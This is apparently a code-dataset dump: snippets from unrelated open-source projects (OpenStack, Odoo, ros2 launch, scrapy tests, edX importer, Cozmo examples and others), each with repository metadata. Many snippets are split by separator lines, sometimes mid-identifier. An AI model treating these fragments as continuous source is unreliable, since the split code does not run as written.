add_prt_grp_spec = vm_util.get_add_vswitch_port_group_spec(
client_factory,
vswitch_name,
pg_name,
vlan_id)
host_mor = vm_util.get_host_ref(session, cluster)
network_system_mor = session._call_method(vim_util,
"get_dynamic_property", host_mor,
"HostSystem", "configManager.networkSystem")
LOG.debug(_("Creating Port Group with name %s on "
"the ESX host") % pg_name)
try:
session._call_method(session._get_vim(),
"AddPortGroup", network_system_mor,
portgrp=add_prt_grp_spec)
except error_util.VimFaultException as exc:
# There can be a race condition when two instances try
# adding port groups at the same time. One succeeds, then
# the other one will get an exception. Since we are
# concerned with the port group being created, which is done
# by the other call, we can ignore the exception.
if error_util.FAULT_ALREADY_EXISTS not in exc.fault_list:
raise exception.NovaException(exc)
LOG.debug(_("Created Port Group with name %s on "
"the ESX host") % pg_name)
|
Comunitea/CMNT_004_15
|
project-addons/product_outlet_loss/models/product.py
|
Python
|
agpl-3.0
| 1,853
| 0.00054
|
##############################################################################
#
# Copyright (C) 2014 Comunitea Servicios Tecnológicos All Rights Reserved
# $Kiko Sánchez <kiko@comunitea.com>$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from odoo import fields, models, api
from datetime import datetime
class OutletLoss(models.Model):
_name = 'outlet.loss'
@api.multi
@api.depends('qty', 'price_outlet', 'price_unit')
def _get_outlet_loss(self):
for loss in self:
loss.total_lost = loss.qty*(loss.price_outlet-loss.price_unit)
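            # e.g. a hypothetical line with qty=3, price_unit=10.0 and
            # price_outlet=7.5 gives total_lost = 3 * (7.5 - 10.0) = -7.5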
product_i
|
d = fields.Many2one('product.product', 'Product')
price_unit = fields.Float('Price')
price_outlet = fields.Float('Outlet Price')
total_lost = fields.Float("Outlet Loss", compute=_get_outlet_loss,
store=True, readonly=True)
date_move = fields.Date('Move to outlet on', default=fields.da
|
tetime.now())
outlet_ok = fields.Boolean('Outlet')
order_line_id = fields.Many2one('sale.order.line', 'Order Line')
qty = fields.Float('Quantity')
percent = fields.Float('Outlet Percent')
|
ros2/launch
|
launch/launch/conditions/launch_configuration_equals.py
|
Python
|
apache-2.0
| 2,600
| 0.001923
|
# Copyright 2020 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for LaunchConfigurationEquals class."""
from typing import Optional
from typing import Text
from ..condition import Condition
from ..launch_context import LaunchContext
from ..some_substitutions_type import SomeSubstitutionsType
from ..utilities import normalize_to_list_of_substitutions
from ..utilities import perform_substitutions
class LaunchConfigurationEquals(Condition):
"""
Condition on the value of a launch configuration.
This condition takes an optional string expression that is compared with the value of
a launch configuration.
If the value is equal to the launch configuration value, then this ``Condition``
evaluates to ``True``.
The expression may consist of :py:class:`launch.Substitution` instances.
If ``None`` is provided instead of a string expression, then the condition
evaluates to ``True`` if the launch configuration is not set.
"""
def __init__(
self,
launch_configuration_name: Text,
expected_value: Optional[SomeSubstitutionsType]
) -> None:
self.__launch_configuration_name = launch_configuration_name
if expected_value is not None:
self.__expected_value = normalize_to_list_of_subst
|
itutions(expected_value)
else:
self.__expected_value = None
super().__init__(predicate=self._predicate_func)
def _predicate_func(self, context: LaunchContext) -> bool:
expanded_expected_value = None
if self.__expected_value is not None:
expanded_expected_value = perform_substitutions(context, self.__expected_value)
try:
value = context.launch_configurati
|
ons[self.__launch_configuration_name]
return value == expanded_expected_value
except KeyError:
if expanded_expected_value is None:
return True
return False
def describe(self) -> Text:
"""Return a description of this Condition."""
return self.__repr__()
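# A minimal usage sketch (illustrative only; the argument name, default value and
# LogInfo message are assumptions, not part of this module):
def _example_launch_description():
    from launch import LaunchDescription
    from launch.actions import DeclareLaunchArgument, LogInfo
    from launch.conditions import LaunchConfigurationEquals
    return LaunchDescription([
        DeclareLaunchArgument('mode', default_value='sim'),
        # The log action is only executed when the 'mode' configuration is 'sim'.
        LogInfo(msg='running in simulation mode',
                condition=LaunchConfigurationEquals('mode', 'sim')),
    ])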
|
Connexions/cnx-publishing
|
cnxpublishing/views/moderation.py
|
Python
|
agpl-3.0
| 3,154
| 0
|
# -*- coding: utf-8 -*-
# ###
# Copyright (c) 2013-2016, Rice University
# This software is subject to the provisions of the GNU Affero General
# Public License version 3 (AGPLv3).
# See LICENCE.txt for details.
# ###
from pyramid import httpexceptions
from pyramid.view import view_config
from ..db import poke_publication_state, db_connect
@view_config(route_name='moderation', request_method='GET',
accept="application/json",
renderer='json', permission='moderate', http_cache=0)
def get_moderation(request):
"""Return the list of publications that need moderation."""
with db_connect() as db_conn:
with db_conn.cursor() as cursor:
cursor.execute("""\
SELECT row_to_json(combined_rows) FROM (
SELECT id, created, publisher, publication_message,
(select array_agg(row_to_json(pd))
from pending_documents as pd
where pd.publication_id = p.id) AS models
FROM publications AS p
WHERE state = 'Waiting for moderation') AS combined_rows""")
moderations = [x[0] for x in cursor.fetchall()]
return moderations
@view_config(route_name='moderate', request_method='POST',
accept="application/json", permission='moderate', http_cache=0)
def post_moderation(request):
publication_id = request.matchdict['id']
posted = request.json
if 'is_accepted' not in posted \
or not isinstance(posted.get('is_accepted'), bool):
raise httpexceptions.HTTPBadRequest(
"Missing or invalid 'is_accepted' value.")
is_accepted = posted['is_accepted']
with db_connect() as db_conn:
with db_conn.cursor() as cursor:
if is_accepted:
# Give the publisher moderation approval.
cursor.execute("""\
UPDATE users SET (is_moderated) = ('t')
WHERE username = (SELECT publisher FROM publications
WHERE id = %s and state = 'Waiting for moderation')""",
(publication_id,))
# Poke the publication into a state change.
poke_publication_state(publication_id, cursor)
else:
# Reject! And Vacuum properties of the publication
# record to /dev/null.
cursor.execute("""\
UPDATE users SET (is_moderated) = ('f')
WHERE username = (SELECT publisher FROM publications
  WHERE id = %s and state = 'Waiting for moderation')""",
(publication_id,))
cursor.execute("""\
UPDATE publications SET (epub, state) = (null, 'Rejected')
WHERE id = %s""", (publication_id,))
return httpexceptions.HTTPAccepted()
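# A minimal client-side sketch (illustrative only; the URL, the credentials and
# the 'requests' dependency are assumptions, not part of this package). The
# moderate endpoint expects a JSON body carrying a boolean 'is_accepted' flag.
def _example_moderation_request(publication_id, accept=True):
    import requests
    return requests.post(
        'https://publishing.example.org/moderate/{}'.format(publication_id),
        json={'is_accepted': accept},
        auth=('moderator', 'secret'))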
@view_config(route_name='admin-moderation', request_method='GET',
renderer="cnxpublishing.views:templates/moderations.html",
permission='moderate', http_cache=0)
@view_config(route_name='moderation-rss', request_method='
|
GET',
renderer="cnxpublishing.views:templates/moderations.rss",
permission='view', http_cache=0)
def admin_moderations(request): # pragma: no cover
|
return {'moderations': get_moderation(request)}
|
ofanoyi/scrapy
|
scrapy/tests/test_utils_python.py
|
Python
|
bsd-3-clause
| 6,570
| 0.001218
|
import functools
import operator
import unittest
from itertools import count
from scrapy.utils.python import str_to_unicode, unicode_to_str, \
memoizemethod_noargs, isbinarytext, equal_attributes, \
WeakKeyCache, stringify_dict, get_func_args
__doctests__ = ['scrapy.utils.python']
class UtilsPythonTestCase(unittest.TestCase):
def test_str_to_unicode(self):
# converting an utf-8 encoded string to unicode
self.assertEqual(str_to_unicode('lel\xc3\xb1e'), u'lel\xf1e')
# converting a latin-1 encoded string to unicode
self.assertEqual(str_to_unicode('lel\xf1e', 'latin-1'), u'lel\xf1e')
# converting a unicode to unicode should return the same object
self.assertEqual(str_to_unicode(u'\xf1e\xf1e\xf1e'), u'\xf1e\xf1e\xf1e')
# converting a strange object should raise TypeError
self.assertRaises(TypeError, str_to_unicode, 423)
# check errors argument works
assert u'\ufffd' in str_to_unicode('a\xedb', 'utf-8', errors='replace')
def test_unicode_to_str(self):
# converting a unicode object to an utf-8 encoded string
self.assertEqual(unicode_to_str(u'\xa3 49'), '\xc2\xa3 49')
# converting a unicode object to a latin-1 encoded string
self.assertEqual(unicode_to_str(u'\xa3 49', 'latin-1'), '\xa3 49')
# converting a regular string to string should return the same object
self.assertEqual(unicode_to_str('lel\xf1e'), 'lel\xf1e')
# converting a strange object should raise TypeError
self.assertRaises(TypeError, unicode_to_str, unittest)
# check errors argument works
assert '?' in unicode_to_str(u'a\ufffdb', 'latin-1', errors='replace')
def test_memoizemethod_noargs(self):
class A(object):
@memoizemethod_noargs
def cached(self):
return object()
def noncached(self):
return object()
a = A()
one = a.cached()
two = a.cached()
three = a.noncached()
assert one is two
assert one is not three
def test_isbinarytext(self):
# basic tests
assert not isbinarytext("hello")
# utf-16 strings contain null bytes
assert not isbinarytext(u"hello".encode('utf-16'))
# one with encoding
assert not isbinarytext("<div>Price \xa3</div>")
# finally some real binary bytes
assert isbinarytext("\x02\xa3")
def test_equal_attributes(self):
class Obj:
pass
a = Obj()
b = Obj()
# no attributes given return False
self.failIf(equal_attributes(a, b, []))
# not existent attributes
self.failIf(equal_attributes(a, b, ['x', 'y']))
a.x = 1
b.x = 1
# equal attribute
self.failUnless(equal_attributes(a, b, ['x']))
b.y = 2
# obj1 has no attribute y
self.failIf(equal_attributes(a, b, ['x',
|
'y']))
a.y = 2
# equal attributes
self.failUnless(equal_attributes(a, b, ['x', 'y']))
a.y = 1
        # different attributes
self.failIf(equal_attributes(a, b, ['x', 'y']))
# test callable
a.meta = {}
b.meta = {}
se
|
lf.failUnless(equal_attributes(a, b, ['meta']))
# compare ['meta']['a']
a.meta['z'] = 1
b.meta['z'] = 1
get_z = operator.itemgetter('z')
get_meta = operator.attrgetter('meta')
compare_z = lambda obj: get_z(get_meta(obj))
self.failUnless(equal_attributes(a, b, [compare_z, 'x']))
# fail z equality
a.meta['z'] = 2
self.failIf(equal_attributes(a, b, [compare_z, 'x']))
def test_weakkeycache(self):
class _Weakme(object): pass
_values = count()
wk = WeakKeyCache(lambda k: next(_values))
k = _Weakme()
v = wk[k]
self.assertEqual(v, wk[k])
self.assertNotEqual(v, wk[_Weakme()])
self.assertEqual(v, wk[k])
del k
self.assertFalse(len(wk._weakdict))
def test_stringify_dict(self):
d = {'a': 123, u'b': 'c', u'd': u'e', object(): u'e'}
d2 = stringify_dict(d, keys_only=False)
self.failUnlessEqual(d, d2)
self.failIf(d is d2) # shouldn't modify in place
self.failIf(any(isinstance(x, unicode) for x in d2.keys()))
self.failIf(any(isinstance(x, unicode) for x in d2.values()))
def test_stringify_dict_tuples(self):
tuples = [('a', 123), (u'b', 'c'), (u'd', u'e'), (object(), u'e')]
d = dict(tuples)
d2 = stringify_dict(tuples, keys_only=False)
self.failUnlessEqual(d, d2)
self.failIf(d is d2) # shouldn't modify in place
self.failIf(any(isinstance(x, unicode) for x in d2.keys()), d2.keys())
self.failIf(any(isinstance(x, unicode) for x in d2.values()))
def test_stringify_dict_keys_only(self):
d = {'a': 123, u'b': 'c', u'd': u'e', object(): u'e'}
d2 = stringify_dict(d)
self.failUnlessEqual(d, d2)
self.failIf(d is d2) # shouldn't modify in place
self.failIf(any(isinstance(x, unicode) for x in d2.keys()))
def test_get_func_args(self):
def f1(a, b, c):
pass
def f2(a, b=None, c=None):
pass
class A(object):
def __init__(self, a, b, c):
pass
def method(self, a, b, c):
pass
class Callable(object):
def __call__(self, a, b, c):
pass
a = A(1, 2, 3)
cal = Callable()
partial_f1 = functools.partial(f1, None)
partial_f2 = functools.partial(f1, b=None)
partial_f3 = functools.partial(partial_f2, None)
self.assertEqual(get_func_args(f1), ['a', 'b', 'c'])
self.assertEqual(get_func_args(f2), ['a', 'b', 'c'])
self.assertEqual(get_func_args(A), ['a', 'b', 'c'])
self.assertEqual(get_func_args(a.method), ['a', 'b', 'c'])
self.assertEqual(get_func_args(partial_f1), ['b', 'c'])
self.assertEqual(get_func_args(partial_f2), ['a', 'c'])
self.assertEqual(get_func_args(partial_f3), ['c'])
self.assertEqual(get_func_args(cal), ['a', 'b', 'c'])
self.assertEqual(get_func_args(object), [])
# TODO: how do we fix this to return the actual argument names?
self.assertEqual(get_func_args(unicode.split), [])
self.assertEqual(get_func_args(" ".join), [])
if __name__ == "__main__":
unittest.main()
|
mcmartins/chaosproxy
|
setup.py
|
Python
|
mit
| 564
| 0.001773
|
from setuptools import setup
from chaosproxy.chaosproxy import __version__
setup(
name='ChaosProxy',
version=__version__,
description='ChaosProxy is an http 1.0 proxy / forward server that creates unstable connections.',
url='http://github.com/mcmartins/chaosproxy',
|
author='Manuel Martins',
author_email='manuelmachadomartins@gmail.com',
license='MIT',
packages=['chaosproxy'],
package_
|
data={'chaosproxy': ['sample-conf.json']},
requires=['argparse'],
install_requires=[
'argparse'
],
zip_safe=False
)
|
BackupTheBerlios/espressopp
|
src/esutil/NormalVariate.py
|
Python
|
gpl-3.0
| 1,470
| 0.009524
|
# Copyright (C) 2012,2013
# Max Planck Institute for Polymer Research
# Copyright (C) 2008,2009,2010,2011
# Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License
|
as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICUL
|
AR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
*********************************
**espresso.esutil.NormalVariate**
*********************************
"""
from espresso import pmi
from espresso.esutil import cxxinit
from _espresso import esutil_NormalVariate
class NormalVariateLocal(esutil_NormalVariate):
def __init__(self, mean=0.0, sigma=1.0):
cxxinit(self, esutil_NormalVariate, mean, sigma)
if pmi.isController:
class NormalVariate(object):
__metaclass__ = pmi.Proxy
"""A random normal variate."""
pmiproxydefs = dict(
cls = 'espresso.esutil.NormalVariateLocal',
localcall = [ '__call__' ],
)
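# A minimal usage sketch (illustration only; it assumes an initialized
# ESPResSo++/pmi session on the controller, which this module does not set up
# by itself):
#
#     nv = espresso.esutil.NormalVariate(mean=0.0, sigma=1.0)
#     x = nv()   # draw one normally distributed sample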
|
UQ-UQx/edx-platform_lti
|
common/lib/xmodule/xmodule/modulestore/xml_importer.py
|
Python
|
agpl-3.0
| 40,861
| 0.002007
|
"""
Each store has slightly different semantics wrt draft v published. XML doesn't officially recognize draft
but does hold it in a subdir. Old mongo has a virtual but not physical draft for every unit in published state.
Split mongo has a physical for every unit in every state.
Given that, here's a table of semantics and behaviors where - means no record and letters indicate values.
For xml, (-, x) means the item is published and can be edited. For split, it means the item's
been deleted from draft and will be deleted from published the next time it gets published. old mongo
can't represent that virtual state (2nd row in table)
In the table body, the tuples represent virtual modulestore result. The row headers represent the pre-import
modulestore state.
Modulestore virtual | XML physical (draft, published)
(draft, published) | (-, -) | (x, -) | (x, x) | (x, y) | (-, x)
----------------------+--------------------------------------------
(-, -) | (-, -) | (x, -) | (x, x) | (x, y) | (-, x)
(-, a) | (-, a) | (x, a) | (x, x) | (x, y) | (-, x) : deleted from draft before import
(a, -) | (a, -) | (x, -) | (x, x) | (x, y) | (a, x)
(a, a) | (a, a) | (x, a) | (x, x) | (x, y) | (a, x)
(a, b) | (a, b) | (x, b) | (x, x) | (x, y) | (a, x)
"""
import logging
import os
import mimetypes
from path import path
import json
import re
from lxml import etree
from .xml import XMLModuleStore, ImportSystem, ParentTracker
from xblock.runtime import KvsFieldData, DictKeyValueStore
from xmodule.x_module import XModuleDescriptor
from opaque_keys.edx.keys import UsageKey
from xblock.fields import Scope, Reference, ReferenceList, ReferenceValueDict
from xmodule.contentstore.content import StaticContent
from .inheritance import own_metadata
from xmodule.errortracker import make_error_tracker
from .store_utilities import rewrite_nonportable_content_links
import xblock
from xmodule.tabs import CourseTabList
from xmodule.assetstore import AssetMetadata
from xmodule.modulestore.django import ASSET_IGNORE_REGEX
from xmodule.modulestore.exceptions import DuplicateCourseError
from xmodule.modulestore.mongo.base import MongoRevisionKey
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.store_utilities import draft_node_constructor, get_draft_subtree_roots
log = logging.getLogger(__name__)
def import_static_content(
course_data_path, static_content_store,
target_course_id, subpath='static', verbose=False):
remap_dict = {}
# now import all static assets
static_dir = course_data_path / subpath
try:
with open(course_data_path / 'policies/assets.json') as f:
policy = json.load(f)
except (IOError, ValueError) as err:
# xml backed courses won't have this file, only exported courses;
# so, its absence is not really an exception.
policy = {}
verbose = True
mimetypes.add_type('application/octet-stream', '.sjson')
mimetypes.add_type('application/octet-stream', '.srt')
mimetypes_list = mimetypes.types_map.values()
for dirname, _, filenames in os.walk(static_dir):
for filename in filenames:
content_path = os.path.join(dirname, filename)
if re.match(ASSET_IGNORE_REGEX, filename):
if verbose:
log.debug('skipping static content %s...', content_path)
continue
if verbose:
log.debug('importing static content %s...', content_path)
try:
with open(content_path, 'rb') as f:
data = f.read()
except IOError:
if filename.startswith('._'):
# OS X "companion files". See
# http://www.diigo.com/annotated/0c936fda5da4aa1159c189cea227e174
continue
# Not a 'hidden file', then re-raise exception
raise
# strip away leading path from the name
fullname_with_subpath = content_path.replace(static_dir, '')
if fullname_with_subpath.startswith('/'):
fullname_with_subpath = fullname_with_subpath[1:]
asset_key = StaticContent.compute_location(target_course_id, fullname_with_subpath)
policy_ele = policy.get(asset_key.path, {})
displayname = policy_ele.get('displayname', filename)
locked = policy_ele.get('locked', False)
mime_type = policy_ele.get('contentType')
# Check extracted contentType in list of all valid mimetypes
if not mime_type or mime_type not in mimetypes_list:
mime_type = mimetypes.guess_type(filename)[0] # Assign guessed mimetype
content = StaticContent(
asset_key, displayname, mime_type, data,
import_path=fullname_with_subpath, locked=locked
)
# first let's save a thumbnail so we can get back a thumbnail location
thumbnail_content, thumbnail_location = static_content_store.generate_thumbnail(content)
if thumbnail_content is not None:
content.thumbnail_location = thumbnail_location
# then commit the content
try:
static_content_store.save(content)
except Exception as err:
log.exception(u'Error importing {0}, error={1}'.format(
fullname_with_subpath, err
))
# store the remapping information which will be needed
            # to substitute in the module data
remap_dict[fullname_with_subpath] = asset_key
return remap_dict
def import_from_xml(
store, user_id, data_dir, course_dirs=None,
default_class='xmodule.raw_module.RawDescriptor',
load_error_modules=True, static_content_store=None,
target_course_id=None, verbose=False,
do_import_static=True, create_course_if_not_present=False,
raise_on_failure=False):
"""
Import xml-based courses from data_dir into modulestore.
Returns:
list of new course objects
Args:
store: a modulestore implementing ModuleStoreWriteBase in which to store the imported courses.
data_dir: the root directory from which to find the xml courses.
course_dirs: If specified, the list of data_dir subdirectories to load. Otherwise, load
all course dirs
target_course_id: is the CourseKey that all modules should be remapped to
after import off disk. NOTE: this only makes sense if importing only
            one course. If more than one course is loaded from data_dir/course_dirs and you
            supply this id, this method will raise an AssertException.
static_content_store: the static asset store
        do_import_static: if True, then import the course's static files into static_content_store
This can be employed for courses which have substantial
unchanging static content, which is too inefficient to import every
time the course is loaded. Static content for some courses may also be
served directly by nginx, instead of going through django.
create_course_if_not_present: If True, then a new course is created if it doesn't already exist.
Otherwise, it throws an InvalidLocationError if the course does not exist.
default_class, load_error_modules: are arguments for constructing the XMLModuleStore (see its doc)
"""
xml_module_store = XMLModuleStore(
data_dir,
default_class=default_class,
course_dirs=course_dirs,
load_error_modules=load_error_modules,
xblock_mixins=store.xblock_mixins,
xblock_select=store.xblock_select,
)
# If we're going to remap the course_id, then we can only do that with
# a single course
if target_course_id:
assert(len(xml_module_store.modules) == 1)
new_courses = []
for course_key in xml_module_store.modules.keys():
if target_course_id is not None:
|
drufat/dec
|
doc/plot/cheb/basis_forms.py
|
Python
|
gpl-3.0
| 1,067
| 0.008435
|
from dec.grid1 import *
import matplotlib.pyplot as plt
N = 4
#g = Grid_1D.periodic(N)
g = Grid_1D.regular(N)
#g = Grid_1D.chebyshev(N)
z = linspace(g.xmin, g.xmax, 100) #+ 1e-16
B0, B1, B0d, B1d = g.basis_fn()
H0, H1, H0d, H1d = hodge_star_matrix(g.projection(), g.basis_fn())
H1d = linalg.inv(H0)
#polynomial fit
#def poly_coeff(basis):
# A = array([polyfit(z, b(z), len(basis)-1)[::-1] for i, b in enumerate(basis)])
# return A
#print poly_coeff(g.B0)
#print poly_coeff(g.B1d)
plt.figure()
A = linalg.inv(H0).T
U = array([b(z) for b in B1d])
V = dot(A, array([b(z) for b in B0]))
for u, v in zip(U, V):
plt.plot(z, u)
plt.plot(z, v, color='k')
plt.scatter(g.verts, 0*g.verts)
plt.scatter(g.verts_dual, 0*g.verts_dual, color='r', marker='x')
plt.figure()
A = linalg.inv(H1).T
U = array([b(z) for b in B0d])
V = dot(A, array([b(z) for b in B1]))
for u, v in zip(U, V):
plt.plot(z, u)
plt.plot(z, v, color='k')
plt.scatter(g.verts, 0*g.verts)
plt.scatter(g.verts_dual, 0*g.verts_dual, color='r', marker='x')
plt.show()
|
thumbor-community/shortener
|
docs/conf.py
|
Python
|
mit
| 8,491
| 0.005889
|
# -*- coding: utf-8 -*-
#
# Thumbor documentation build configuration file, created by
# sphinx-quickstart on Mon Sep 1 13:18:38 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import sphinx_rtd_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, thumbor.__path__)
sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Thumbor Community Shortener Extension'
copyright = u'Thumbor Community'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# version = thumbor.__version__
# The full version, including alpha/beta/rc tags.
# release = thumbor.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#html_theme = 'default'
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Thumborcommdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
    #'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
# latex_documents = [
# ('index', 'Thumbor.tex', u'Thumbor Documentation',
# u'Bernardo Heynemann', 'manual'),
# ]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
# man_pages = [
# ('index', 'thumbor', u'Thumbor Documentation',
# [u'Bernardo Heynemann'], 1)
# ]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Thumbor Community', u'Thumbor Community Documentation',
u'@masom', 'Thumbor Community', 'Thumbor Community Extensions',
'Miscellaneous'),
]
# Documents to append as an appendix
|
ssut/PushBank
|
pushbank/_singleton.py
|
Python
|
mit
| 330
| 0
|
class _Singleton(type):
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
|
cls._instances[cls] = super(_Singleton, cls).__call__(
*args, **kwargs)
return cls._instances[cls]
class Singleton(_Singleton('SingletonMeta', (object,), {})):
pass
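# Minimal usage sketch (the subclass name below is hypothetical, added only to
# illustrate the pattern): every instantiation returns the same cached object.
if __name__ == '__main__':
    class _ExampleService(Singleton):
        pass
    assert _ExampleService() is _ExampleService()  # same instance both times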
|
manxueitp/cozmo-test
|
object_recognition/04_exposure.py
|
Python
|
mit
| 4,967
| 0.001812
|
#!/usr/bin/env python3
# Copyright (c) 2017 Anki, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Demonstrate the manual and auto exposure settings of Cozmo's camera.
This example demonstrates the use of auto exposure and manual exposure for
Cozmo's camera. The current camera settings are overlayed onto the camera
viewer window.
'''
import sys
import time
try:
from PIL import ImageDraw, ImageFont
import numpy as np
except ImportError:
sys.exit('run `pip3 install --user Pillow numpy` to run this example')
import cozmo
# A global string value to display in the camera viewer window to make it more
# obvious what the example program is currently doing.
example_mode = ""
# An annotator for live-display of all of the camera info on top of the camera
# viewer window.
@cozmo.annotate.annotator
def camera_info(image, scale, annotator=None, world=None, **kw):
d = ImageDraw.Draw(image)
bounds = [3, 0, image.width, image.height]
camera = world.robot.camera
text_to_display = "Example Mode: " + example_mode + "\n\n"
text_to_display += "Fixed Camera Settings (Calibrated for this Robot):\n\n"
text_to_display += 'focal_length: %s\n' % camera.config.focal_length
text_to_display += 'center: %s\n' % camera.config.center
text_to_display += 'fov: <%.3f, %.3f> degrees\n' % (camera.config.fov_x.degrees,
camera.config.fov_y.degrees)
text_to_display += "\n"
text_to_display += "Valid exposure and gain ranges:\n\n"
text_to_display += 'exposure: %s..%s\n' % (camera.config.min_exposure_time_ms,
camera.config.max_exposure_time_ms)
text_to_display += 'gain: %.3f..%.3f\n' % (camera.config.min_gain,
camera.config.max_gain)
